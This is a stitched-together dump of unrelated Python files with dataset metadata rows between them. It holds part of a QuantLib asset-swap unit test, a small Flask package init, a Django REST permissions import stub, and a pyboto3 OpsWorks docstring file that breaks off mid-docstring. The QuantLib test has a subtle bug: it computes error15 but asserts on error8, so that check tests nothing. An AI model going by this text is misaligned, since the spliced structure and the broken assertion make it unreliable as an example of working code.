zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1, Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
## generic bond
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnSpecializedBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnSpecializedBondPrice1 = zeroCpnSpecializedBond1.cleanPrice()
zeroCpnBondAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondPrice1,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondAssetSwap1.setPricingEngine(swapEngine)
zeroCpnSpecializedBondAssetSwap1 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond1,
zeroCpnSpecializedBondPrice1,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnBondAssetSwap1.fairCleanPrice()
zeroCpnSpecializedBondAssetSwapPrice1 = zeroCpnSpecializedBondAssetSwap1.fairCleanPrice()
error13 = abs(zeroCpnBondAssetSwapPrice1-zeroCpnSpecializedBondAssetSwapPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zerocpn bond:"
+ "\n generic zero cpn bond's clean price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n specialized equivalent bond's price: " + str(zeroCpnSpecializedBondAssetSwapPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
zeroCpnBondMktPrice1 = 72.277
zeroCpnBondASW1 = AssetSwap(payFixedRate,
zeroCpnBond1,zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondASW1.setPricingEngine(swapEngine)
zeroCpnSpecializedBondASW1 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondASW1.setPricingEngine(swapEngine)
zeroCpnBondASWSpread1 = zeroCpnBondASW1.fairSpread()
zeroCpnSpecializedBondASWSpread1 = zeroCpnSpecializedBondASW1.fairSpread()
error14 = abs(zeroCpnBondASWSpread1-zeroCpnSpecializedBondASWSpread1)
self.assertFalse(error14>tolerance,
"wrong asw spread for zeroCpn bond:"
+ "\n generic zeroCpn bond's asw spread: " + str(zeroCpnBondASWSpread1)
+ "\n equivalent specialized bond's asw spread: " + str(zeroCpnSpecializedBondASWSpread1)
+ "\n error: " + str(error14)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity doesn't occur on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2, Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
## generic bond
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## specialized zerocpn bond
zeroCpnSpecializedBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnSpecializedBond2.setPricingEngine(bondEngine)
zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnSpecializedBondPrice2 = zeroCpnSpecializedBond2.cleanPrice()
zeroCpnBondAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondPrice2,
self.iborIndex, self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondAssetSwap2.setPricingEngine(swapEngine)
zeroCpnSpecializedBondAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond2,
zeroCpnSpecializedBondPrice2,
self.iborIndex,
self.nonnullspread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnBondAssetSwap2.fairCleanPrice()
zeroCpnSpecializedBondAssetSwapPrice2 = zeroCpnSpecializedBondAssetSwap2.fairCleanPrice()
error15 = abs(zeroCpnBondAssetSwapPrice2 -zeroCpnSpecializedBondAssetSwapPrice2)
self.assertFalse(error8>tolerance,
"wrong clean price for zerocpn bond:"
+ "\n generic zero cpn bond's clean price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n equivalent specialized bond's price: " + str(zeroCpnSpecializedBondAssetSwapPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
## market executable price as of 4th sept 2007
zeroCpnBondMktPrice2 = 72.277
zeroCpnBondASW2 = AssetSwap(payFixedRate,
zeroCpnBond2,zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondASW2.setPricingEngine(swapEngine)
zeroCpnSpecializedBondASW2 = AssetSwap(payFixedRate,
zeroCpnSpecializedBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnSpecializedBondASW2.setPricingEngine(swapEngine)
zeroCpnBondASWSpread2 = zeroCpnBondASW2.fairSpread()
zeroCpnSpecializedBondASWSpread2 = zeroCpnSpecializedBondASW2.fairSpread()
error16 = abs(zeroCpnBondASWSpread2-zeroCpnSpecializedBondASWSpread2)
self.assertFalse(error16>tolerance,
"wrong asw spread for zeroCpn bond:"
+ "\n generic zeroCpn bond's asw spread: " + str(zeroCpnBondASWSpread2)
+ "\n equivalent specialized bond's asw spread: " + str(zeroCpnSpecializedBondASWSpread2)
+ "\n error: " + str(error16)
+ "\n tolerance: " + str(tolerance))
if __name__ == '__main__':
print('testing QuantLib ' + QuantLib.__version__)
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AssetSwapTest,'test'))
unittest.TextTestRunner(verbosity=2).run(suite)
| 54.543071 | 141 | 0.555607 | 12,830 | 189,319 | 8.197584 | 0.050585 | 0.027316 | 0.013596 | 0.023009 | 0.871367 | 0.853996 | 0.850269 | 0.847511 | 0.830425 | 0.805809 | 0 | 0.049868 | 0.367961 | 189,319 | 3,470 | 142 | 54.55879 | 0.829103 | 0.057527 | 0 | 0.848051 | 0 | 0 | 0.097077 | 0 | 0 | 0 | 0 | 0 | 0.039328 | 1 | 0.003575 | false | 0 | 0.000715 | 0 | 0.004648 | 0.000358 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9d3b00b379a8972f0586184373ecc187363c8179 | 79 | py | Python | gcpflask/__init__.py | stanford-rc/gcp-flask-stanford | d0da1b5650792582ada90fac63796ee974805c17 | [
"MIT"
] | 3 | 2020-07-28T21:23:29.000Z | 2021-07-14T17:37:02.000Z | gcpflask/__init__.py | stanford-rc/gcp-flask-stanford | d0da1b5650792582ada90fac63796ee974805c17 | [
"MIT"
] | 2 | 2020-07-22T22:07:43.000Z | 2020-07-24T20:22:56.000Z | gcpflask/__init__.py | stanford-rc/gcp-flask-stanford | d0da1b5650792582ada90fac63796ee974805c17 | [
"MIT"
] | null | null | null | from .server import app
from . import views
def create_app():
return app
| 11.285714 | 23 | 0.708861 | 12 | 79 | 4.583333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227848 | 79 | 6 | 24 | 13.166667 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
19b6dc4078ff33196d5b3c05c80c71222dd134e9 | 168 | py | Python | products/permissions/products.py | julianarchila/ecommerce-django-api | d0665745c2a16dc8bc1acb54ead66f69da129271 | [
"MIT"
] | null | null | null | products/permissions/products.py | julianarchila/ecommerce-django-api | d0665745c2a16dc8bc1acb54ead66f69da129271 | [
"MIT"
] | null | null | null | products/permissions/products.py | julianarchila/ecommerce-django-api | d0665745c2a16dc8bc1acb54ead66f69da129271 | [
"MIT"
] | null | null | null | """ Products custom permissions. """
# Django REST Framework
from rest_framework.permissions import BasePermission
from rest_framework.permissions import IsAdminUser | 24 | 53 | 0.827381 | 18 | 168 | 7.611111 | 0.555556 | 0.284672 | 0.248175 | 0.408759 | 0.49635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113095 | 168 | 7 | 54 | 24 | 0.919463 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
dfae4a6cbae09fe6416854ab5aa68fe8b6ba6329 | 168,585 | py | Python | pyboto3/opsworks.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/opsworks.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/opsworks.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def assign_instance(InstanceId=None, LayerIds=None):
"""
Assign a registered instance to a layer.
See also: AWS API Documentation
:example: response = client.assign_instance(
InstanceId='string',
LayerIds=[
'string',
]
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type LayerIds: list
:param LayerIds: [REQUIRED]
The layer ID, which must correspond to a custom layer. You cannot assign a registered instance to a built-in layer.
(string) --
:returns:
InstanceId (string) -- [REQUIRED]
The instance ID.
LayerIds (list) -- [REQUIRED]
The layer ID, which must correspond to a custom layer. You cannot assign a registered instance to a built-in layer.
(string) --
"""
pass
def assign_volume(VolumeId=None, InstanceId=None):
"""
Assigns one of the stack's registered Amazon EBS volumes to a specified instance. The volume must first be registered with the stack by calling RegisterVolume . After you register the volume, you must call UpdateVolume to specify a mount point before calling AssignVolume . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.assign_volume(
VolumeId='string',
InstanceId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
:type InstanceId: string
:param InstanceId: The instance ID.
"""
pass
def associate_elastic_ip(ElasticIp=None, InstanceId=None):
"""
Associates one of the stack's registered Elastic IP addresses with a specified instance. The address must first be registered with the stack by calling RegisterElasticIp . For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.associate_elastic_ip(
ElasticIp='string',
InstanceId='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
:type InstanceId: string
:param InstanceId: The instance ID.
"""
pass
def attach_elastic_load_balancer(ElasticLoadBalancerName=None, LayerId=None):
"""
Attaches an Elastic Load Balancing load balancer to a specified layer. For more information, see Elastic Load Balancing .
See also: AWS API Documentation
:example: response = client.attach_elastic_load_balancer(
ElasticLoadBalancerName='string',
LayerId='string'
)
:type ElasticLoadBalancerName: string
:param ElasticLoadBalancerName: [REQUIRED]
The Elastic Load Balancing instance's name.
:type LayerId: string
:param LayerId: [REQUIRED]
The ID of the layer that the Elastic Load Balancing instance is to be attached to.
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def clone_stack(SourceStackId=None, Name=None, Region=None, VpcId=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, UseOpsworksSecurityGroups=None, CustomCookbooksSource=None, DefaultSshKeyName=None, ClonePermissions=None, CloneAppIds=None, DefaultRootDeviceType=None, AgentVersion=None):
"""
Creates a clone of a specified stack. For more information, see Clone a Stack . By default, all parameters are set to the values used by the parent stack.
See also: AWS API Documentation
:example: response = client.clone_stack(
SourceStackId='string',
Name='string',
Region='string',
VpcId='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
UseOpsworksSecurityGroups=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
ClonePermissions=True|False,
CloneAppIds=[
'string',
],
DefaultRootDeviceType='ebs'|'instance-store',
AgentVersion='string'
)
:type SourceStackId: string
:param SourceStackId: [REQUIRED]
The source stack ID.
:type Name: string
:param Name: The cloned stack name.
:type Region: string
:param Region: The cloned stack AWS region, such as 'ap-northeast-2'. For more information about AWS regions, see Regions and Endpoints .
:type VpcId: string
:param VpcId: The ID of the VPC that the cloned stack is to be launched into. It must be in the specified region. All instances are launched into this VPC, and you cannot change the ID later.
If your account supports EC2 Classic, the default value is no VPC.
If your account does not support EC2 Classic, the default value is the default VPC for the specified region.
If the VPC ID corresponds to a default VPC and you have specified either the DefaultAvailabilityZone or the DefaultSubnetId parameter only, AWS OpsWorks Stacks infers the value of the other parameter. If you specify neither parameter, AWS OpsWorks Stacks sets these parameters to the first valid Availability Zone for the specified region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
It must belong to a VPC in your account that is in the specified region.
You must specify a value for DefaultSubnetId .
For more information on how to use AWS OpsWorks Stacks with a VPC, see Running a Stack in a VPC . For more information on default VPC and EC2 Classic, see Supported Platforms .
:type Attributes: dict
:param Attributes: A list of stack attributes and values as key/value pairs to be added to the cloned stack.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: [REQUIRED]
The stack AWS Identity and Access Management (IAM) role, which allows AWS OpsWorks Stacks to work with AWS resources on your behalf. You must set this parameter to the Amazon Resource Name (ARN) for an existing IAM role. If you create a stack by using the AWS OpsWorks Stacks console, it creates the role for you. You can obtain an existing stack's IAM ARN programmatically by calling DescribePermissions . For more information about IAM ARNs, see Using Identifiers .
Note
You must set this parameter to a valid service role ARN or the action will fail; there is no default value. You can specify the source stack's service role ARN, if you prefer, but you must do so explicitly.
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: The Amazon Resource Name (ARN) of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's operating system, which must be set to one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
The default option is the parent stack's operating system. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
Note
You can specify a different Linux operating system for the cloned stack, but you cannot change from Linux to Windows or Windows to Linux.
:type HostnameTheme: string
:param HostnameTheme: The stack's host name theme, with spaces are replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The cloned stack's default Availability Zone, which must be in the specified region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see the VpcId parameter description.
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It is used to override the corresponding default stack configuration JSON values. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager. When you clone a stack we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 12.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether to use custom cookbooks.
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. With UseOpsworksSecurityGroups you can instead provide your own custom security groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate Amazon Elastic Compute Cloud (Amazon EC2) security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on creation; custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key pair name. The default value is none. If you specify a key pair name, AWS OpsWorks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type ClonePermissions: boolean
:param ClonePermissions: Whether to clone the source stack's permissions.
:type CloneAppIds: list
:param CloneAppIds: A list of source stack app IDs to be included in the cloned stack.
(string) --
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is used by default for all instances in the cloned stack, but you can override it when you create an instance. For more information, see Storage for the Root Device .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is LATEST . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
:rtype: dict
:return: {
'StackId': 'string'
}
"""
pass
def create_app(StackId=None, Shortname=None, Name=None, Description=None, DataSources=None, Type=None, AppSource=None, Domains=None, EnableSsl=None, SslConfiguration=None, Attributes=None, Environment=None):
"""
Creates an app for a specified stack. For more information, see Creating Apps .
See also: AWS API Documentation
:example: response = client.create_app(
StackId='string',
Shortname='string',
Name='string',
Description='string',
DataSources=[
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
Type='aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
AppSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
Domains=[
'string',
],
EnableSsl=True|False,
SslConfiguration={
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
Attributes={
'string': 'string'
},
Environment=[
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type Shortname: string
:param Shortname: The app's short name.
:type Name: string
:param Name: [REQUIRED]
The app name.
:type Description: string
:param Description: A description of the app.
:type DataSources: list
:param DataSources: The app's data source.
(dict) --Describes an app's data source.
Type (string) --The data source's type, AutoSelectOpsworksMysqlInstance , OpsworksMysqlInstance , or RdsDbInstance .
Arn (string) --The data source's ARN.
DatabaseName (string) --The database name.
:type Type: string
:param Type: [REQUIRED]
The app type. Each supported type is associated with a particular layer. For example, PHP applications are associated with a PHP layer. AWS OpsWorks Stacks deploys an application to those instances that are members of the corresponding layer. If your app isn't one of the standard types, or you prefer to implement your own Deploy recipes, specify other .
:type AppSource: dict
:param AppSource: A Source object that specifies the app repository.
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type Domains: list
:param Domains: The app virtual host settings, with multiple domains separated by commas. For example: 'www.example.com, example.com'
(string) --
:type EnableSsl: boolean
:param EnableSsl: Whether to enable SSL for the app.
:type SslConfiguration: dict
:param SslConfiguration: An SslConfiguration object with the SSL configuration.
Certificate (string) -- [REQUIRED]The contents of the certificate's domain.crt file.
PrivateKey (string) -- [REQUIRED]The private key; the contents of the certificate's domain.kex file.
Chain (string) --Optional. Can be used to specify an intermediate certificate authority key or client authentication.
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type Environment: list
:param Environment: An array of EnvironmentVariable objects that specify environment variables to be associated with the app. After you deploy the app, these variables are defined on the associated app server instance. For more information, see Environment Variables .
There is no specific limit on the number of environment variables. However, the size of the associated data structure - which includes the variables' names, values, and protected flag values - cannot exceed 10 KB (10240 Bytes). This limit should accommodate most if not all use cases. Exceeding it will cause an exception with the message, 'Environment: is too large (maximum is 10KB).'
Note
This parameter is supported only by Chef 11.10 stacks. If you have specified one or more environment variables, you cannot modify the stack's Chef version.
(dict) --Represents an app's environment variable.
Key (string) -- [REQUIRED](Required) The environment variable's name, which can consist of up to 64 characters and must be specified. The name can contain upper- and lowercase letters, numbers, and underscores (_), but it must start with a letter or underscore.
Value (string) -- [REQUIRED](Optional) The environment variable's value, which can be left empty. If you specify a value, it can contain up to 256 characters, which must all be printable.
Secure (boolean) --(Optional) Whether the variable's value will be returned by the DescribeApps action. To conceal an environment variable's value, set Secure to true . DescribeApps then returns *****FILTERED***** instead of the actual value. The default value for Secure is false .
:rtype: dict
:return: {
'AppId': 'string'
}
"""
pass
def create_deployment(StackId=None, AppId=None, InstanceIds=None, LayerIds=None, Command=None, Comment=None, CustomJson=None):
"""
Runs deployment or stack commands. For more information, see Deploying Apps and Run Stack Commands .
See also: AWS API Documentation
:example: response = client.create_deployment(
StackId='string',
AppId='string',
InstanceIds=[
'string',
],
LayerIds=[
'string',
],
Command={
'Name': 'install_dependencies'|'update_dependencies'|'update_custom_cookbooks'|'execute_recipes'|'configure'|'setup'|'deploy'|'rollback'|'start'|'stop'|'restart'|'undeploy',
'Args': {
'string': [
'string',
]
}
},
Comment='string',
CustomJson='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type AppId: string
:param AppId: The app ID. This parameter is required for app deployments, but not for other deployment commands.
:type InstanceIds: list
:param InstanceIds: The instance IDs for the deployment targets.
(string) --
:type LayerIds: list
:param LayerIds: The layer IDs for the deployment targets.
(string) --
:type Command: dict
:param Command: [REQUIRED]
A DeploymentCommand object that specifies the deployment command and any associated arguments.
Name (string) -- [REQUIRED]Specifies the operation. You can specify only one command.
For stacks, the following commands are available:
execute_recipes : Execute one or more recipes. To specify the recipes, set an Args parameter named recipes to the list of recipes to be executed. For example, to execute phpapp::appsetup , set Args to {'recipes':['phpapp::appsetup']} .
install_dependencies : Install the stack's dependencies.
update_custom_cookbooks : Update the stack's custom cookbooks.
update_dependencies : Update the stack's dependencies.
Note
The update_dependencies and install_dependencies commands are supported only for Linux instances. You can run the commands successfully on Windows instances, but they do nothing.
For apps, the following commands are available:
deploy : Deploy an app. Ruby on Rails apps have an optional Args parameter named migrate . Set Args to {'migrate':['true']} to migrate the database. The default setting is {'migrate':['false']}.
rollback Roll the app back to the previous version. When you update an app, AWS OpsWorks Stacks stores the previous version, up to a maximum of five versions. You can use this command to roll an app back as many as four versions.
start : Start the app's web or application server.
stop : Stop the app's web or application server.
restart : Restart the app's web or application server.
undeploy : Undeploy the app.
Args (dict) --The arguments of those commands that take arguments. It should be set to a JSON object with the following format:
{'arg_name1' : ['value1', 'value2', ...], 'arg_name2' : ['value1', 'value2', ...], ...}
The update_dependencies command takes two arguments:
